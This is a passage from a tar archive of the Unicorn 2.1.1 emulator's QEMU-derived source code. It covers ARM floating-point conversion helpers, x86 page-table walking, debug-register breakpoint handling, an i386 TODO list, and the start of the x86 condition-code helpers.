float_raise(float_flag_invalid, status); frac = 0; } else { int true_exp = exp - 1023; int shift = true_exp - 52; /* Restore implicit bit. */ frac |= 1ull << 52; /* Shift the fraction into place. */ if (shift >= 0) { /* The number is so large we must shift the fraction left. */ if (shift >= 64) { /* The fraction is shifted out entirely. */ frac = 0; } else { frac <<= shift; } } else if (shift > -64) { /* Normal case -- shift right and notice if bits shift out. */ inexact = (frac << (64 + shift)) != 0; frac >>= -shift; } else { /* The fraction is shifted out entirely. */ frac = 0; } /* Notice overflow or inexact exceptions. */ if (true_exp > 31 || frac > (sign ? 0x80000000ull : 0x7fffffff)) { /* Overflow, for which this operation raises invalid. */ float_raise(float_flag_invalid, status); inexact = 1; } else if (inexact) { float_raise(float_flag_inexact, status); } /* Honor the sign. */ if (sign) { #ifdef _MSC_VER frac = 0 - frac; #else frac = -frac; #endif } } /* Pack the result and the env->ZF representation of Z together. */ return deposit64(frac, 32, 32, inexact); } uint32_t HELPER(vjcvt)(float64 value, CPUARMState *env) { uint64_t pair = HELPER(fjcvtzs)(value, &env->vfp.fp_status); uint32_t result = pair; uint32_t z = (pair >> 32) == 0; /* Store Z, clear NCV, in FPSCR.NZCV. */ env->vfp.xregs[ARM_VFP_FPSCR] = (env->vfp.xregs[ARM_VFP_FPSCR] & ~CPSR_NZCV) | (z * CPSR_Z); return result; } /* Round a float32 to an integer that fits in int32_t or int64_t. */ static float32 frint_s(float32 f, float_status *fpst, int intsize) { int old_flags = get_float_exception_flags(fpst); uint32_t exp = extract32(f, 23, 8); if (unlikely(exp == 0xff)) { /* NaN or Inf. */ goto overflow; } /* Round and re-extract the exponent. */ f = float32_round_to_int(f, fpst); exp = extract32(f, 23, 8); /* Validate the range of the result. */ if (exp < 126 + intsize) { /* abs(F) <= INT{N}_MAX */ return f; } if (exp == 126 + intsize) { uint32_t sign = extract32(f, 31, 1); uint32_t frac = extract32(f, 0, 23); if (sign && frac == 0) { /* F == INT{N}_MIN */ return f; } } overflow: /* * Raise Invalid and return INT{N}_MIN as a float. Revert any * inexact exception float32_round_to_int may have raised. */ set_float_exception_flags(old_flags | float_flag_invalid, fpst); return (0x100u + 126u + intsize) << 23; } float32 HELPER(frint32_s)(float32 f, void *fpst) { return frint_s(f, fpst, 32); } float32 HELPER(frint64_s)(float32 f, void *fpst) { return frint_s(f, fpst, 64); } /* Round a float64 to an integer that fits in int32_t or int64_t. */ static float64 frint_d(float64 f, float_status *fpst, int intsize) { int old_flags = get_float_exception_flags(fpst); uint32_t exp = extract64(f, 52, 11); if (unlikely(exp == 0x7ff)) { /* NaN or Inf. */ goto overflow; } /* Round and re-extract the exponent. */ f = float64_round_to_int(f, fpst); exp = extract64(f, 52, 11); /* Validate the range of the result. */ if (exp < 1022 + intsize) { /* abs(F) <= INT{N}_MAX */ return f; } if (exp == 1022 + intsize) { uint64_t sign = extract64(f, 63, 1); uint64_t frac = extract64(f, 0, 52); if (sign && frac == 0) { /* F == INT{N}_MIN */ return f; } } overflow: /* * Raise Invalid and return INT{N}_MIN as a float. Revert any * inexact exception float64_round_to_int may have raised. */ set_float_exception_flags(old_flags | float_flag_invalid, fpst); return (uint64_t)(0x800 + 1022 + intsize) << 52; } float64 HELPER(frint32_d)(float64 f, void *fpst) { return frint_d(f, fpst, 32); } float64 HELPER(frint64_d)(float64 f, void *fpst) { return frint_d(f, fpst, 64); } void HELPER(check_hcr_el2_trap)(CPUARMState *env, uint32_t rt, uint32_t reg) { uint32_t syndrome; switch (reg) { case ARM_VFP_MVFR0: case ARM_VFP_MVFR1: case ARM_VFP_MVFR2: if (!(arm_hcr_el2_eff(env) & HCR_TID3)) { return; } break; case ARM_VFP_FPSID: if (!(arm_hcr_el2_eff(env) & HCR_TID0)) { return; } break; default: g_assert_not_reached(); break; } syndrome = ((EC_FPIDTRAP << ARM_EL_EC_SHIFT) | ARM_EL_IL | (1 << 24) | (0xe << 20) | (7 << 14) | (reg << 10) | (rt << 5) | 1); raise_exception(env, EXCP_HYP_TRAP, syndrome, 2); } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/���������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016132�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/TODO�����������������������������������������������������������������0000664�0000000�0000000�00000002040�14675241067�0016616�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������Correctness issues: - some eflags manipulation incorrectly reset the bit 0x2. - SVM: test, cpu save/restore, SMM save/restore. - x86_64: lcall/ljmp intel/amd differences ? - better code fetch (different exception handling + CS.limit support) - user/kernel PUSHL/POPL in helper.c - add missing cpuid tests - return UD exception if LOCK prefix incorrectly used - test ldt limit < 7 ? - fix some 16 bit sp push/pop overflow (pusha/popa, lcall lret) - full support of segment limit/rights - full x87 exception support - improve x87 bit exactness (use bochs code ?) - DRx register support - CR0.AC emulation - SSE alignment checks Optimizations/Features: - add SVM nested paging support - add VMX support - add AVX support - add SSE5 support - fxsave/fxrstor AMD extensions - improve monitor/mwait support - faster EFLAGS update: consider SZAP, C, O can be updated separately with a bit field in CC_OP and more state variables. - evaluate x87 stack pointer statically - find a way to avoid translating several time the same TB if CR0.TS is set or not. ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/arch_memory_mapping.c������������������������������������������������0000664�0000000�0000000�00000025542�14675241067�0022326�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * i386 memory mapping * * Copyright Fujitsu, Corp. 2011, 2012 * * Authors: * Wen Congyang <wency@cn.fujitsu.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. * */ #include "qemu/osdep.h" #include "cpu.h" #include "sysemu/memory_mapping.h" /* PAE Paging or IA-32e Paging */ static void walk_pte(MemoryMappingList *list, AddressSpace *as, hwaddr pte_start_addr, int32_t a20_mask, target_ulong start_line_addr) { hwaddr pte_addr, start_paddr; uint64_t pte; target_ulong start_vaddr; int i; for (i = 0; i < 512; i++) { pte_addr = (pte_start_addr + i * 8) & a20_mask; #ifdef UNICORN_ARCH_POSTFIX pte = glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(as->uc, as, pte_addr, MEMTXATTRS_UNSPECIFIED, NULL); #else pte = address_space_ldq(as->uc, as, pte_addr, MEMTXATTRS_UNSPECIFIED, NULL); #endif if (!(pte & PG_PRESENT_MASK)) { /* not present */ continue; } start_paddr = (pte & ~0xfff) & ~(0x1ULL << 63); if (cpu_physical_memory_is_io(as, start_paddr)) { /* I/O region */ continue; } start_vaddr = start_line_addr | ((i & 0x1ff) << 12); memory_mapping_list_add_merge_sorted(list, start_paddr, start_vaddr, 1 << 12); } } /* 32-bit Paging */ static void walk_pte2(MemoryMappingList *list, AddressSpace *as, hwaddr pte_start_addr, int32_t a20_mask, target_ulong start_line_addr) { hwaddr pte_addr, start_paddr; uint32_t pte; target_ulong start_vaddr; int i; for (i = 0; i < 1024; i++) { pte_addr = (pte_start_addr + i * 4) & a20_mask; #ifdef UNICORN_ARCH_POSTFIX pte = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(as->uc, as, pte_addr, MEMTXATTRS_UNSPECIFIED, NULL); #else pte = address_space_ldl(as->uc, as, pte_addr, MEMTXATTRS_UNSPECIFIED, NULL); #endif if (!(pte & PG_PRESENT_MASK)) { /* not present */ continue; } start_paddr = pte & ~0xfff; if (cpu_physical_memory_is_io(as, start_paddr)) { /* I/O region */ continue; } start_vaddr = start_line_addr | ((i & 0x3ff) << 12); memory_mapping_list_add_merge_sorted(list, start_paddr, start_vaddr, 1 << 12); } } /* PAE Paging or IA-32e Paging */ #define PLM4_ADDR_MASK 0xffffffffff000ULL /* selects bits 51:12 */ static void walk_pde(MemoryMappingList *list, AddressSpace *as, hwaddr pde_start_addr, int32_t a20_mask, target_ulong start_line_addr) { hwaddr pde_addr, pte_start_addr, start_paddr; uint64_t pde; target_ulong line_addr, start_vaddr; int i; for (i = 0; i < 512; i++) { pde_addr = (pde_start_addr + i * 8) & a20_mask; #ifdef UNICORN_ARCH_POSTFIX pde = glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(as->uc, as, pde_addr, MEMTXATTRS_UNSPECIFIED, NULL); #else pde = address_space_ldq(as->uc, as, pde_addr, MEMTXATTRS_UNSPECIFIED, NULL); #endif if (!(pde & PG_PRESENT_MASK)) { /* not present */ continue; } line_addr = start_line_addr | ((i & 0x1ff) << 21); if (pde & PG_PSE_MASK) { /* 2 MB page */ start_paddr = (pde & ~0x1fffff) & ~(0x1ULL << 63); if (cpu_physical_memory_is_io(as, start_paddr)) { /* I/O region */ continue; } start_vaddr = line_addr; memory_mapping_list_add_merge_sorted(list, start_paddr, start_vaddr, 1 << 21); continue; } pte_start_addr = (pde & PLM4_ADDR_MASK) & a20_mask; walk_pte(list, as, pte_start_addr, a20_mask, line_addr); } } /* 32-bit Paging */ static void walk_pde2(MemoryMappingList *list, AddressSpace *as, hwaddr pde_start_addr, int32_t a20_mask, bool pse) { hwaddr pde_addr, pte_start_addr, start_paddr, high_paddr; uint32_t pde; target_ulong line_addr, start_vaddr; int i; for (i = 0; i < 1024; i++) { pde_addr = (pde_start_addr + i * 4) & a20_mask; #ifdef UNICORN_ARCH_POSTFIX pde = glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(as->uc, as, pde_addr, MEMTXATTRS_UNSPECIFIED, NULL); #else pde = address_space_ldl(as->uc, as, pde_addr, MEMTXATTRS_UNSPECIFIED, NULL); #endif if (!(pde & PG_PRESENT_MASK)) { /* not present */ continue; } line_addr = (((unsigned int)i & 0x3ff) << 22); if ((pde & PG_PSE_MASK) && pse) { /* * 4 MB page: * bits 39:32 are bits 20:13 of the PDE * bit3 31:22 are bits 31:22 of the PDE */ high_paddr = ((hwaddr)(pde & 0x1fe000) << 19); start_paddr = (pde & ~0x3fffff) | high_paddr; if (cpu_physical_memory_is_io(as, start_paddr)) { /* I/O region */ continue; } start_vaddr = line_addr; memory_mapping_list_add_merge_sorted(list, start_paddr, start_vaddr, 1 << 22); continue; } pte_start_addr = (pde & ~0xfff) & a20_mask; walk_pte2(list, as, pte_start_addr, a20_mask, line_addr); } } /* PAE Paging */ static void walk_pdpe2(MemoryMappingList *list, AddressSpace *as, hwaddr pdpe_start_addr, int32_t a20_mask) { hwaddr pdpe_addr, pde_start_addr; uint64_t pdpe; target_ulong line_addr; int i; for (i = 0; i < 4; i++) { pdpe_addr = (pdpe_start_addr + i * 8) & a20_mask; #ifdef UNICORN_ARCH_POSTFIX pdpe = glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(as->uc, as, pdpe_addr, MEMTXATTRS_UNSPECIFIED, NULL); #else pdpe = address_space_ldq(as->uc, as, pdpe_addr, MEMTXATTRS_UNSPECIFIED, NULL); #endif if (!(pdpe & PG_PRESENT_MASK)) { /* not present */ continue; } line_addr = (((unsigned int)i & 0x3) << 30); pde_start_addr = (pdpe & ~0xfff) & a20_mask; walk_pde(list, as, pde_start_addr, a20_mask, line_addr); } } #ifdef TARGET_X86_64 /* IA-32e Paging */ static void walk_pdpe(MemoryMappingList *list, AddressSpace *as, hwaddr pdpe_start_addr, int32_t a20_mask, target_ulong start_line_addr) { hwaddr pdpe_addr, pde_start_addr, start_paddr; uint64_t pdpe; target_ulong line_addr, start_vaddr; int i; for (i = 0; i < 512; i++) { pdpe_addr = (pdpe_start_addr + i * 8) & a20_mask; #ifdef UNICORN_ARCH_POSTFIX pdpe = glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(as->uc, as, pdpe_addr, MEMTXATTRS_UNSPECIFIED, NULL); #else pdpe = address_space_ldq(as->uc, as, pdpe_addr, MEMTXATTRS_UNSPECIFIED, NULL); #endif if (!(pdpe & PG_PRESENT_MASK)) { /* not present */ continue; } line_addr = start_line_addr | ((i & 0x1ffULL) << 30); if (pdpe & PG_PSE_MASK) { /* 1 GB page */ start_paddr = (pdpe & ~0x3fffffff) & ~(0x1ULL << 63); if (cpu_physical_memory_is_io(as, start_paddr)) { /* I/O region */ continue; } start_vaddr = line_addr; memory_mapping_list_add_merge_sorted(list, start_paddr, start_vaddr, 1 << 30); continue; } pde_start_addr = (pdpe & PLM4_ADDR_MASK) & a20_mask; walk_pde(list, as, pde_start_addr, a20_mask, line_addr); } } /* IA-32e Paging */ static void walk_pml4e(MemoryMappingList *list, AddressSpace *as, hwaddr pml4e_start_addr, int32_t a20_mask, target_ulong start_line_addr) { hwaddr pml4e_addr, pdpe_start_addr; uint64_t pml4e; target_ulong line_addr; int i; for (i = 0; i < 512; i++) { pml4e_addr = (pml4e_start_addr + i * 8) & a20_mask; #ifdef UNICORN_ARCH_POSTFIX pml4e = glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(as->uc, as, pml4e_addr, MEMTXATTRS_UNSPECIFIED, #else pml4e = address_space_ldq(as->uc, as, pml4e_addr, MEMTXATTRS_UNSPECIFIED, #endif NULL); if (!(pml4e & PG_PRESENT_MASK)) { /* not present */ continue; } line_addr = start_line_addr | ((i & 0x1ffULL) << 39); pdpe_start_addr = (pml4e & PLM4_ADDR_MASK) & a20_mask; walk_pdpe(list, as, pdpe_start_addr, a20_mask, line_addr); } } static void walk_pml5e(MemoryMappingList *list, AddressSpace *as, hwaddr pml5e_start_addr, int32_t a20_mask) { hwaddr pml5e_addr, pml4e_start_addr; uint64_t pml5e; target_ulong line_addr; int i; for (i = 0; i < 512; i++) { pml5e_addr = (pml5e_start_addr + i * 8) & a20_mask; #ifdef UNICORN_ARCH_POSTFIX pml5e = glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(as->uc, as, pml5e_addr, MEMTXATTRS_UNSPECIFIED, #else pml5e = address_space_ldq(as->uc, as, pml5e_addr, MEMTXATTRS_UNSPECIFIED, #endif NULL); if (!(pml5e & PG_PRESENT_MASK)) { /* not present */ continue; } line_addr = (0x7fULL << 57) | ((i & 0x1ffULL) << 48); pml4e_start_addr = (pml5e & PLM4_ADDR_MASK) & a20_mask; walk_pml4e(list, as, pml4e_start_addr, a20_mask, line_addr); } } #endif void x86_cpu_get_memory_mapping(CPUState *cs, MemoryMappingList *list) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; int32_t a20_mask; if (!cpu_paging_enabled(cs)) { /* paging is disabled */ return; } a20_mask = x86_get_a20_mask(env); if (env->cr[4] & CR4_PAE_MASK) { #ifdef TARGET_X86_64 if (env->hflags & HF_LMA_MASK) { if (env->cr[4] & CR4_LA57_MASK) { hwaddr pml5e_addr; pml5e_addr = (env->cr[3] & PLM4_ADDR_MASK) & a20_mask; walk_pml5e(list, cs->as, pml5e_addr, a20_mask); } else { hwaddr pml4e_addr; pml4e_addr = (env->cr[3] & PLM4_ADDR_MASK) & a20_mask; walk_pml4e(list, cs->as, pml4e_addr, a20_mask, 0xffffULL << 48); } } else #endif { hwaddr pdpe_addr; pdpe_addr = (env->cr[3] & ~0x1f) & a20_mask; walk_pdpe2(list, cs->as, pdpe_addr, a20_mask); } } else { hwaddr pde_addr; bool pse; pde_addr = (env->cr[3] & ~0xfff) & a20_mask; pse = !!(env->cr[4] & CR4_PSE_MASK); walk_pde2(list, cs->as, pde_addr, a20_mask, pse); } } ��������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/bpt_helper.c���������������������������������������������������������0000664�0000000�0000000�00000022227�14675241067�0020427�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * i386 breakpoint helpers * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" static inline bool hw_local_breakpoint_enabled(unsigned long dr7, int index) { return (dr7 >> (index * 2)) & 1; } static inline bool hw_global_breakpoint_enabled(unsigned long dr7, int index) { return (dr7 >> (index * 2)) & 2; } static inline bool hw_breakpoint_enabled(unsigned long dr7, int index) { return hw_global_breakpoint_enabled(dr7, index) || hw_local_breakpoint_enabled(dr7, index); } static inline int hw_breakpoint_type(unsigned long dr7, int index) { return (dr7 >> (DR7_TYPE_SHIFT + (index * 4))) & 3; } static inline int hw_breakpoint_len(unsigned long dr7, int index) { int len = ((dr7 >> (DR7_LEN_SHIFT + (index * 4))) & 3); return (len == 2) ? 8 : len + 1; } static int hw_breakpoint_insert(CPUX86State *env, int index) { CPUState *cs = env_cpu(env); target_ulong dr7 = env->dr[7]; target_ulong drN = env->dr[index]; int err = 0; switch (hw_breakpoint_type(dr7, index)) { case DR7_TYPE_BP_INST: if (hw_breakpoint_enabled(dr7, index)) { err = cpu_breakpoint_insert(cs, drN, BP_CPU, &env->cpu_breakpoint[index]); } break; case DR7_TYPE_IO_RW: /* Notice when we should enable calls to bpt_io. */ return hw_breakpoint_enabled(env->dr[7], index) ? HF_IOBPT_MASK : 0; case DR7_TYPE_DATA_WR: if (hw_breakpoint_enabled(dr7, index)) { err = cpu_watchpoint_insert(cs, drN, hw_breakpoint_len(dr7, index), BP_CPU | BP_MEM_WRITE, &env->cpu_watchpoint[index]); } break; case DR7_TYPE_DATA_RW: if (hw_breakpoint_enabled(dr7, index)) { err = cpu_watchpoint_insert(cs, drN, hw_breakpoint_len(dr7, index), BP_CPU | BP_MEM_ACCESS, &env->cpu_watchpoint[index]); } break; } if (err) { env->cpu_breakpoint[index] = NULL; } return 0; } static void hw_breakpoint_remove(CPUX86State *env, int index) { CPUState *cs = env_cpu(env); switch (hw_breakpoint_type(env->dr[7], index)) { case DR7_TYPE_BP_INST: if (env->cpu_breakpoint[index]) { cpu_breakpoint_remove_by_ref(cs, env->cpu_breakpoint[index]); env->cpu_breakpoint[index] = NULL; } break; case DR7_TYPE_DATA_WR: case DR7_TYPE_DATA_RW: if (env->cpu_breakpoint[index]) { cpu_watchpoint_remove_by_ref(cs, env->cpu_watchpoint[index]); env->cpu_breakpoint[index] = NULL; } break; case DR7_TYPE_IO_RW: /* HF_IOBPT_MASK cleared elsewhere. */ break; } } void cpu_x86_update_dr7(CPUX86State *env, uint32_t new_dr7) { target_ulong old_dr7 = env->dr[7]; int iobpt = 0; int i; new_dr7 |= DR7_FIXED_1; /* If nothing is changing except the global/local enable bits, then we can make the change more efficient. */ if (((old_dr7 ^ new_dr7) & ~0xff) == 0) { /* Fold the global and local enable bits together into the global fields, then xor to show which registers have changed collective enable state. */ int mod = ((old_dr7 | old_dr7 * 2) ^ (new_dr7 | new_dr7 * 2)) & 0xff; for (i = 0; i < DR7_MAX_BP; i++) { if ((mod & (2 << i * 2)) && !hw_breakpoint_enabled(new_dr7, i)) { hw_breakpoint_remove(env, i); } } env->dr[7] = new_dr7; for (i = 0; i < DR7_MAX_BP; i++) { if (mod & (2 << i * 2) && hw_breakpoint_enabled(new_dr7, i)) { iobpt |= hw_breakpoint_insert(env, i); } else if (hw_breakpoint_type(new_dr7, i) == DR7_TYPE_IO_RW && hw_breakpoint_enabled(new_dr7, i)) { iobpt |= HF_IOBPT_MASK; } } } else { for (i = 0; i < DR7_MAX_BP; i++) { hw_breakpoint_remove(env, i); } env->dr[7] = new_dr7; for (i = 0; i < DR7_MAX_BP; i++) { iobpt |= hw_breakpoint_insert(env, i); } } env->hflags = (env->hflags & ~HF_IOBPT_MASK) | iobpt; } static bool check_hw_breakpoints(CPUX86State *env, bool force_dr6_update) { target_ulong dr6; int reg; bool hit_enabled = false; dr6 = env->dr[6] & ~0xf; for (reg = 0; reg < DR7_MAX_BP; reg++) { bool bp_match = false; bool wp_match = false; switch (hw_breakpoint_type(env->dr[7], reg)) { case DR7_TYPE_BP_INST: if (env->dr[reg] == env->eip) { bp_match = true; } break; case DR7_TYPE_DATA_WR: case DR7_TYPE_DATA_RW: if (env->cpu_watchpoint[reg] && env->cpu_watchpoint[reg]->flags & BP_WATCHPOINT_HIT) { wp_match = true; } break; case DR7_TYPE_IO_RW: break; } if (bp_match || wp_match) { dr6 |= 1ULL << reg; if (hw_breakpoint_enabled(env->dr[7], reg)) { hit_enabled = true; } } } if (hit_enabled || force_dr6_update) { env->dr[6] = dr6; } return hit_enabled; } void breakpoint_handler(CPUState *cs) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; CPUBreakpoint *bp; if (cs->watchpoint_hit) { if (cs->watchpoint_hit->flags & BP_CPU) { cs->watchpoint_hit = NULL; if (check_hw_breakpoints(env, false)) { raise_exception(env, EXCP01_DB); } else { cpu_loop_exit_noexc(cs); } } } else { QTAILQ_FOREACH(bp, &cs->breakpoints, entry) { if (bp->pc == env->eip) { if (bp->flags & BP_CPU) { check_hw_breakpoints(env, true); raise_exception(env, EXCP01_DB); } break; } } } } void helper_single_step(CPUX86State *env) { check_hw_breakpoints(env, true); env->dr[6] |= DR6_BS; raise_exception(env, EXCP01_DB); } void helper_rechecking_single_step(CPUX86State *env) { if ((env->eflags & TF_MASK) != 0) { helper_single_step(env); } } void helper_set_dr(CPUX86State *env, int reg, target_ulong t0) { switch (reg) { case 0: case 1: case 2: case 3: if (hw_breakpoint_enabled(env->dr[7], reg) && hw_breakpoint_type(env->dr[7], reg) != DR7_TYPE_IO_RW) { hw_breakpoint_remove(env, reg); env->dr[reg] = t0; hw_breakpoint_insert(env, reg); } else { env->dr[reg] = t0; } return; case 4: if (env->cr[4] & CR4_DE_MASK) { break; } /* fallthru */ case 6: env->dr[6] = t0 | DR6_FIXED_1; return; case 5: if (env->cr[4] & CR4_DE_MASK) { break; } /* fallthru */ case 7: cpu_x86_update_dr7(env, t0); return; } raise_exception_err_ra(env, EXCP06_ILLOP, 0, GETPC()); } target_ulong helper_get_dr(CPUX86State *env, int reg) { switch (reg) { case 0: case 1: case 2: case 3: case 6: case 7: return env->dr[reg]; case 4: if (env->cr[4] & CR4_DE_MASK) { break; } else { return env->dr[6]; } case 5: if (env->cr[4] & CR4_DE_MASK) { break; } else { return env->dr[7]; } } raise_exception_err_ra(env, EXCP06_ILLOP, 0, GETPC()); } /* Check if Port I/O is trapped by a breakpoint. */ void helper_bpt_io(CPUX86State *env, uint32_t port, uint32_t size, target_ulong next_eip) { target_ulong dr7 = env->dr[7]; int i, hit = 0; for (i = 0; i < DR7_MAX_BP; ++i) { if (hw_breakpoint_type(dr7, i) == DR7_TYPE_IO_RW && hw_breakpoint_enabled(dr7, i)) { int bpt_len = hw_breakpoint_len(dr7, i); if (port + size - 1 >= env->dr[i] && port <= env->dr[i] + bpt_len - 1) { hit |= 1 << i; } } } if (hit) { env->dr[6] = (env->dr[6] & ~0xf) | hit; env->eip = next_eip; raise_exception(env, EXCP01_DB); } } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/cc_helper.c����������������������������������������������������������0000664�0000000�0000000�00000023626�14675241067�0020233�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * x86 condition code helpers * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" const uint8_t parity_table[256] = { CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, 0, CC_P, CC_P, 0, 0, CC_P, CC_P, 0, CC_P, 0, 0, CC_P, }; #define SHIFT 0 #include "cc_helper_template.h" #undef SHIFT #define SHIFT 1 #include "cc_helper_template.h" #undef SHIFT #define SHIFT 2 #include "cc_helper_template.h" #undef SHIFT #ifdef TARGET_X86_64 #define SHIFT 3 #include "cc_helper_template.h" #undef SHIFT #endif static target_ulong compute_all_adcx(target_ulong dst, target_ulong src1, target_ulong src2) { return (src1 & ~CC_C) | (dst * CC_C); } static target_ulong compute_all_adox(target_ulong dst, target_ulong src1, target_ulong src2) { return (src1 & ~CC_O) | (src2 * CC_O); } static target_ulong compute_all_adcox(target_ulong dst, target_ulong src1, target_ulong src2) { return (src1 & ~(CC_C | CC_O)) | (dst * CC_C) | (src2 * CC_O); } target_ulong helper_cc_compute_all(target_ulong dst, target_ulong src1, target_ulong src2, int op) { switch (op) { default: /* should never happen */ return 0; case CC_OP_EFLAGS: return src1; case CC_OP_CLR: return CC_Z | CC_P; case CC_OP_POPCNT: return src1 ? 0 : CC_Z; case CC_OP_MULB: return compute_all_mulb(dst, src1); case CC_OP_MULW: return compute_all_mulw(dst, src1); case CC_OP_MULL: return compute_all_mull(dst, src1); case CC_OP_ADDB: return compute_all_addb(dst, src1); case CC_OP_ADDW: return compute_all_addw(dst, src1); case CC_OP_ADDL: return compute_all_addl(dst, src1); case CC_OP_ADCB: return compute_all_adcb(dst, src1, src2); case CC_OP_ADCW: return compute_all_adcw(dst, src1, src2); case CC_OP_ADCL: return compute_all_adcl(dst, src1, src2); case CC_OP_SUBB: return compute_all_subb(dst, src1); case CC_OP_SUBW: return compute_all_subw(dst, src1); case CC_OP_SUBL: return compute_all_subl(dst, src1); case CC_OP_SBBB: return compute_all_sbbb(dst, src1, src2); case CC_OP_SBBW: return compute_all_sbbw(dst, src1, src2); case CC_OP_SBBL: return compute_all_sbbl(dst, src1, src2); case CC_OP_LOGICB: return compute_all_logicb(dst, src1); case CC_OP_LOGICW: return compute_all_logicw(dst, src1); case CC_OP_LOGICL: return compute_all_logicl(dst, src1); case CC_OP_INCB: return compute_all_incb(dst, src1); case CC_OP_INCW: return compute_all_incw(dst, src1); case CC_OP_INCL: return compute_all_incl(dst, src1); case CC_OP_DECB: return compute_all_decb(dst, src1); case CC_OP_DECW: return compute_all_decw(dst, src1); case CC_OP_DECL: return compute_all_decl(dst, src1); case CC_OP_SHLB: return compute_all_shlb(dst, src1); case CC_OP_SHLW: return compute_all_shlw(dst, src1); case CC_OP_SHLL: return compute_all_shll(dst, src1); case CC_OP_SARB: return compute_all_sarb(dst, src1); case CC_OP_SARW: return compute_all_sarw(dst, src1); case CC_OP_SARL: return compute_all_sarl(dst, src1); case CC_OP_BMILGB: return compute_all_bmilgb(dst, src1); case CC_OP_BMILGW: return compute_all_bmilgw(dst, src1); case CC_OP_BMILGL: return compute_all_bmilgl(dst, src1); case CC_OP_ADCX: return compute_all_adcx(dst, src1, src2); case CC_OP_ADOX: return compute_all_adox(dst, src1, src2); case CC_OP_ADCOX: return compute_all_adcox(dst, src1, src2); #ifdef TARGET_X86_64 case CC_OP_MULQ: return compute_all_mulq(dst, src1); case CC_OP_ADDQ: return compute_all_addq(dst, src1); case CC_OP_ADCQ: return 